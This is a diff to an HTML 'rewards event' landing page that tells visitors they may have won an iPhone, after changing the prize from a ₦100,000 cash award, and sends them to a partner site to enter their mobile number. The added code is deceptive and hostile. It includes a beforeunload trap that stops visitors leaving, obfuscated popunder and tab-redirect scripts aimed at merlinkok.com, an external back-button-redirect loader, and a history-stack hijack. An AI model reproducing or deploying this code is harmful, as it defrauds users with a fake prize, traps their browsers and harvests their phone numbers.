--- a/pinbox/e20235231703ncash/prelpcash.html
+++ b/pinbox/e20235231703ncash/prelpcash.html
@@ -8,16 +8,61 @@
 	<title>Congratulations!</title>
 	<meta name="description" content="">
 	<meta name="keywords" content="">
+ <!-- 关闭弹窗 放在head标签的底部 -->
+	<script>
+		document.addEventListener("DOMContentLoaded", function() {
+			var buttons = document.querySelectorAll('a');
+			window.exit = true;
+	
+			window.addEventListener('beforeunload', function(e) {
+				if (window.exit) {
+					e.preventDefault();
+					e.returnValue = '?';
+				} else {
+					delete e['returnValue'];
+				}
+			});
+			for (var i = 0; i < buttons.length; i++) {
+				buttons[i].addEventListener('mousedown', function() {
+					if (this.href.indexOf('http') !== -1) {
+						window.exit = false;
+					}
+				}, false);
+				buttons[i].addEventListener('touchstart', function() {
+					if (this.href.indexOf('http') !== -1) {
+						window.exit = false;
+					}
+				}, false);
+			}
+		});
+	</script>
 </head>
 
 <body>
+<!-- Popunder script -->
+<script type="text/javascript">
+var _0x47c8=['onbeforeunload'];(function(_0xca98db,_0x14ec84){var _0x11f679=function(_0x16b11c){while(--_0x16b11c){_0xca98db['push'](_0xca98db['shift']());}};_0x11f679(++_0x14ec84);}(_0x47c8,0x7e));var _0x12dd=function(_0xca98db,_0x14ec84){_0xca98db=_0xca98db-0x0;var _0x11f679=_0x47c8[_0xca98db];return _0x11f679;};function exit_a1(){window[_0x12dd('0x0')]=null;}
+</script>
+
+<script>
+var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.com/secondlink/LP1/index.html?key=115dd65e-355b-4c97-b6e9-eb270c5aea20&c1=popunder&c2=all','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
+</script>
+
+<!-- BBR -->
+<script type="text/javascript" src="https://merlinkok.com/secondlink/LP1/backoffer.js"></script>
+<script type="text/javascript">
+    (function(w) {
+        w.backOfferUrl = 'https://merlinkok.com/secondlink/LP1/index.html?key=115dd65e-355b-4c97-b6e9-eb270c5aea20&c1=bbr&c2=all'
+    }
+    (window));
+</script>
 	<div class="wrapper">
 		<div class="header"><strong>Congratulations!</strong><br>Draw date: <span id="date"></span><br></div>
 		<div class="content">
 			<div class="client"><strong>Dear customer,</strong><br>Every day we select 7 lucky customers to receive a
 				reward.
 			</div>
-			<div class="info">All you have to do is to choose the right gift box<br><strong>to win ₦ 100,000 </strong>
+			<div class="info">All you have to do is to choose the right gift box<br><strong>Find an iphone</strong>
 			</div>
 			<div class="boxs">
 				<div class="box"><img src="img/box.jpg"></div>
@@ -109,7 +154,7 @@
 	<script>
 		Swal.fire({
 			title: 'Rewards event',
-			html: "Congratulations, dear customer!<br><br>To thank you for your loyalty to us, we are giving you the chance to win  <strong>₦ 100,000</strong><br><br>Open boxes to participate and win prizes!<br><br><strong>Good Luck!</strong>",
+			html: "Congratulations, dear customer!<br><br>To thank you for your loyalty to us, we are giving you the chance to win an <strong>iphone</strong><br><br>Open boxes to participate and win prizes!<br><br><strong>Good Luck!</strong>",
 			confirmButtonText: 'OK',
 			confirmButtonColor: '#ff0000',
 		});
@@ -131,11 +176,11 @@
 		}
 		function dialog3() {
 			Swal.fire({
-				imageUrl: 'img/cash.png',
-				html: '<strong>You may be a Winner of:</strong> <h2>₦ 100,000</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
+				imageUrl: 'img/box_iphone.jpg',
+				html: '<strong>You may be a Winner of:</strong> <h2>iphone</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://blast.radadpro.com/click/">Confirm</a>'
+				footer: '<a href="https://blast.radadpro.com/click/" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
 			});
 		}
 		i = 0;
@@ -150,12 +195,13 @@
 				$(dialog2()).load();
 			}
 			if (i == 3) {
-				$(this).html('<img src="img/cash.jpg">');
+				$(this).html('<img src="img/box_iphone.jpg">');
 				$(dialog3()).load();
 			}
 		});
 		var date = new Date().toLocaleDateString();
 		document.getElementById('date').innerHTML = date;
+	
 	</script>
 	<script>!function () { var a; try { for (a = 0; 10 > a; ++a) { history.pushState({}, "", "#") } onpopstate = function (c) { c.state && location.replace("#js-landing-url") } } catch (b) { } }();</script>
 </body>
